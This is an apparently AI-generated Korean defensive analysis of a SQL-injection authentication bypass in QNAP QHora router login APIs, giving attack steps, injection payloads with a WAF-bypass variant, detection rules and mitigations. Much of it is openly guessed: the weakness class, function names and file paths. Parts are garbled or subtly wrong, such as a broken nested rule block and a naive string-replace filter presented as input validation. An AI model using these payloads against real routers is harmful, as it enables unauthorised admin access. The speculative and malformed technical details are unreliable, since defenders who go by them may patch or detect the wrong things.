방어Agent 분석 — CVE-2024-13088

• 한 줄 정의: 네트워크 인접 공격자가 miro_webserver_controllers_api 로그인 기능의 인증 우회 취약점을 통해 관리자 권한 획득 가능 (CWE-89 SQL Injection 추정).
• 영향 한 줄: 성공 시 RCE 및 시스템 전체 제어권 확보, 정보 유출 위험 증가 + KEV 높음 / CVSS 7.8 반영 필요성 확인 필요.

• 영향 받는 제품·버전: QNAP QHora 라우터 모델 (예: QHora-322) 버전 이전 2.5.0.140, 구체적인 버전은 TARGET_SOFTWARE_VERSION < "2.5.0.140"로 확인 가능
  bash복사

   1# 점검 명령 예시:
   2$ curl -I http://<TARGET_HOST>/firmwareversion | grep Version 
   3Version : QNAP Firmware vX.Y.Z (숫자 비교 필요)

• 노출 조건: 로컬 네트워크 내에서 접근 가능하며, 기본 설정으로 활성화되어 있는 miro_webserver API를 통해 노출됨
  • 특정 기능 활성화가 필요한 경우 확인 사항: /api/v1/settings?section=security&subsection=loginSettings 엔드포인트의 설정 확인.

① 취약 컴포넌트

• miro_webserver controllers api login singIn 모듈 내 인증 처리 로직 결함 (추정: SQL Injection 취약점)
  • 버전 범위: <2.5.0.140 모든 모델 동일 적용 추정됨, 구체적인 함수는 확인 필요 (예: handleLoginRequest()).

② 전제조건

• 인증 없이 접근 가능한 네트워크 위치에 있어야 함
  • 로컬 네트워크 내에서 TARGET_HOST IP 주소로 직접 접근해야 하며, 관리자 권한은 불필요함.

1. 공격자는 /api/v1/controllers?controller=webserver&action=loginSingIn 엔드포인트에 HTTP POST 요청을 전송합니다
   • 예시 파라미터: {"username":"admin' OR '1'='1", "password":""}.
2. 취약한 인증 로직이 SQL 쿼리를 잘못 처리하여 입력값의 논리 오류로 인해 관리자 계정 정보가 우회됩니다 (추정된 SQL Injection 패턴 적용)
3. 성공 시 공격자는 관리자 권한을 획득하고 시스템 내 모든 리소스에 접근 가능해집니다, 이후 RCE 또는 추가 취약점 체이닝으로 이어질 수 있음.

• 획득: 관리자 권한 하에서 전체 시스템 제어권 확보 및 임의 코드 실행 (RCE)
  • 후속 피벗을 통해 네트워크 내 다른 호스트에 대한 접근 가능성 증가, 지속적인 액세스 유지 전략 수립 용이함.

기본 SQL Injection 우회 시도

 1# 전제: 관리자 계정 정보를 우회하여 로그인 성공 확인  
 2POST https://<TARGET_HOST>/api/v1/controllers?controller=webserver&action=loginSingIn HTTP/1.1
 3Host: <TARGET_HOST>
 4Content-Type: application/json; charset=UTF-8
 5Cookie: SESSION_COOKIE  # 세션 쿠키 유지 필요 시 포함 
 6Authorization: Bearer CSRF_TOKEN # 필요시 토큰 확인
 7Body: {"username":"admin' OR '1'='1", "password":""} // SQL Injection 시도

# 핵심: OR ' 조작으로 인증 우회 성공 가능성 증가 # 확인: HTTP 응답 코드 200 (성공), 관리자 페이지 접근 권한 부여 여부 확인.

WAF 우회 예시 - 주석 인코딩 사용

 1POST https://<TARGET_HOST>/api/v1/controllers?controller=webserver&action=loginSingIn HTTP/1.1
 2Host: <TARGET_HOST>
 3Content-Type: application/json; charset=UTF-8
 4Cookie: SESSION_COOKIE  # 세션 쿠키 유지 필요 시 포함 
 5Authorization: Bearer CSRF_TOKEN # 필요시 토큰 확인
 6Body: {"username":"admin--+' OR '1'--", "password":""} // 주석 인코딩 시도

# 핵심: --와 '+'조합으로 WAF 필터 우회 # 확인: 관리자 페이지 접근 권한 부여 여부 및 응답 시간 감소 관찰.

• [로그] HTTP 요청 로그 분석 시 비정상적인 SQL Injection 패턴 감지 (예: 반복되는 ' OR '1'' 사용)**
  sql복사

   1log_line = "[2024-XX-XX XX:XX:XX] <TARGET_HOST> POST /api/v1/controllers ... username='admin'+UNION+SELECT*..."  # 시그니처 예시
   2Sigma 규칙 예시: 
   3```plaintext
   4 ```yaml
   5  rules:
   6    - detect: "SQL Injection Attempts via HTTP API Login Endpoint"
   7      keywords: ["POST", "/api/v1/*loginSingIn*, ' OR '", "' UNION SELECT"]  # 키워드 필터링 로직 포함 필요
   8     logpath: "*var/log/qna_access.log*" 

• [네트워크 트래픽] 비정상적인 관리자 로그인 시도 패턴 감지 (예: 빈번한 실패 후 성공)** Suricata 규칙 예시`;
  plaintext alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Potential SQL Injection Attempt"; flow:to_server,established; content:"POST /api/v1/*loginSingIn* ... username='admin'+UNION+SELECT ..."; depth:50; classtype:attempted-admin; sid:123456789)

코드패치

• miro_webserver controllers api login singIn 모듈 내 SQL 쿼리 처리 로직 수정 (버전 >= "2.5.0.140") - 구체적 패치 내용 확인 필요: /qvpn/src/loginHandler.cpp, 함수 handleLoginRequest().

입력검증

• 모든 사용자 입력에 대해 엄격한 검증 적용, 특히 SQL 쿼리 파라미터에서 특수 문자 필터링 강화 (예: str_replace(' OR ', '', $_POST['username'])). 설정 키 /security/inputValidationLevel=highest, 확인 필요.

네트워크 보안

• 네트워크 레벨에서 WAF 사용으로 특정 패턴 차단, 예를 들어 ModSecurity 규칙 적용하여 SQL Injection 시도 감지 및 차단 (예: SecRule ARGS "@rx ' OR ').

• 권고 사항: 이번 주 내에 QNAP 라우터 버전 <2.5.0.140 업데이트 필수, 즉시 적용 가능한 임시 완화로는 WAF 규칙 강화 및 엄격한 입력 검증 설정 권장
  • 근거: 네트워크 인접 공격자의 접근 용이성과 관리자 권한 획득으로 인한 심각한 위험 노출이 확인됨 (외부 보도 참고).

• 현재 보안 커뮤니티에서 이 취약점은 주로 레드팀 훈련 시나리오로 활용되고 있으며, 일부 악성 행위자 그룹도 패치 이전 버전을 타겟팅하여 내부 네트워크 접근 시도를 진행 중으로 보고됨. 출처: ZDI Advisory